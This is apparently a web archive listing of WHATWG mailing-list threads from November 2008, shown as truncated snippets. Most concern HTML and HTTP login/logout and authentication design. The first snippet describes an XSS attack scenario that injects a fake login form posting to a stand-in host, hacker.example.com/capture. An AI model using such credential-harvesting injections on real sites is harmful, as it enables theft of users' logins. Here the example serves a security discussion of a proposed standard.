Re: [whatwg] Solving the login/logout problem in HTML

Ian Hickson wrote: On Wed, 26 Nov 2008, Philip Taylor wrote: If I'm not misunderstanding things, there is a new attack scenario: I post a comment on someone's blog, saying a href=/restricted-access.php?xsshole=form action=http://hacker.example.com/capture name=logininput name=usernameinput

Re: [whatwg] Solving the login/logout problem in HTML

Martin Atkins wrote: ... I may be forgetting missing some use-cases here (I don't recall what exactly motivated this custom auth scheme) but there may still be value in a cut-down version of this scheme: ... I concede that once you generalize it in this way it becomes even less relevant

Re: [whatwg] Solving the login/logout problem in HTML

On Wed, Nov 26, 2008 at 10:38 PM, Ian Hickson wrote: Ok let me rephrase. What are the user agent requirements for processing the realm value? For other schemes, it's basically show the realm to the user as a hint as to what password is wanted. The realm is (should be) part of the key used by

Re: [whatwg] Feeedback on dfn, abbr, and other elements

From: Ian Hickson [EMAIL PROTECTED] Subject: Re: [whatwg] Feeedback on dfn, abbr, and other elements related to cross-references To: Calogero Alex Baldacchino [EMAIL PROTECTED] Cc: WHAT Working Group whatwg@lists.whatwg.org Message-ID: [EMAIL PROTECTED] Content-Type: TEXT/PLAIN; charset=US-ASCII

Re: [whatwg] Solving the login/logout problem in HTML

On Wed, Nov 26, 2008 at 11:40 PM, Martin Atkins wrote: Julian Reschke wrote: You can already handle the case of content that's available unauthenticated, but would potentially differ in case of being authenticated by adding Vary: Authorization to a response. According to section 14.8

Re: [whatwg] Solving the login/logout problem in HTML

Thomas Broyer wrote: ... Julian is saying that if your page varies depending on the user being authenticated and/or the client not being authenticated at all, you (the origin server) should include a Vary: Authorization. This means that if a shared cache has cached the response to an

Re: [whatwg] Solving the login/logout problem in HTML

On Thu, Nov 27, 2008 at 1:41 PM, Julian Reschke wrote: Thomas Broyer wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely?

Re: [whatwg] Solving the login/logout problem in HTML

Thomas Broyer wrote: I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web site (including most if not all e-commerce web sites) are facing, and

Re: [whatwg] Solving the login/logout problem in HTML

Henri Sivonen wrote: That seems like a bad optimization. Adding an off-the-shelf HTML parser to a bot is much easier than tuning the general crawling functionality and task-specific functionality of a bot. I suspect this will require far more of the bot than merely parsing HTML. Many login

Re: [whatwg] Solving the login/logout problem in HTML

On Thu, Nov 27, 2008 at 5:56 PM, Julian Reschke wrote: Thomas Broyer wrote: I don't really mind, as long as the server is able to say I give you this thing to you anonymous user, but you can also authenticate (e.g. to be proposed more features). This is the exact use-case many web site

Re: [whatwg] Solving the login/logout problem in HTML

Asbjørn Ulsberg wrote: [Response 1] HTTP/1.1 401 Unauthorized WWW-Authenticate: HTML realm=Administration !DOCTYPE html html form action=/login input name=username input type=password name=password input type=submit /form /html Interesting. If we go down

Re: [whatwg] Solving the login/logout problem in HTML

Julian Reschke wrote: ... Actually, what's missing from HTTP is a way to ask you to authenticate but allow anonymous authentication (others have proposed sending a ... Could you define what anonymous authentication would mean precisely? I'm not sure this is what the OP meant, but I'd

Re: [whatwg] Solving the login/logout problem in HTML

On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL PROTECTED] wrote: Martin Atkins wrote: Your auth token here seems to me to be equivalent to a session cookie. Yes, it does. But since session cookies are just that: cookies -- it isn't. An authentication token is

Re: [whatwg] Solving the login/logout problem in HTML

On Wed, 26 Nov 2008 23:42:33 +0100, Calogero Alex Baldacchino [EMAIL PROTECTED] wrote: Martin Atkins wrote: Your auth token here seems to me to be equivalent to a session cookie. Yes, it does. But since session cookies are just that: cookies -- it isn't. An authentication token is

Re: [whatwg] Feeedback on dfn, abbr, and other elements

On Thu, 27 Nov 2008, Pentasis wrote: Actually, it would solve a problem like this: What if I style abbr so that the title attribute is shown after the abbreviation: abbr[title]:after { content: (attr(title)); } Now obviously I don't need and don't want to do this for every

Re: [whatwg] getElementsByClassName() feedback

On Thu, 27 Nov 2008 22:38:32 +0100, Garrett Smith [EMAIL PROTECTED] wrote: It is often desirable to capture events on bubble and interrogate the EventTarget using a hasClassName function to see if it has a className that the program is concerned with. [...] HTML5 already has the

Re: [whatwg] Fallback styles for legacy user agents [was: Re: Deprecating small , b ?]

Calogero Alex Baldacchino wrote: That worked fine on Opera 9 and FF2, but, when tried on IE7, the show became a little weird... the element was there, the style attribute was regarded as for any other element (display:block worked), but didn't applied to any of its descendents, as if they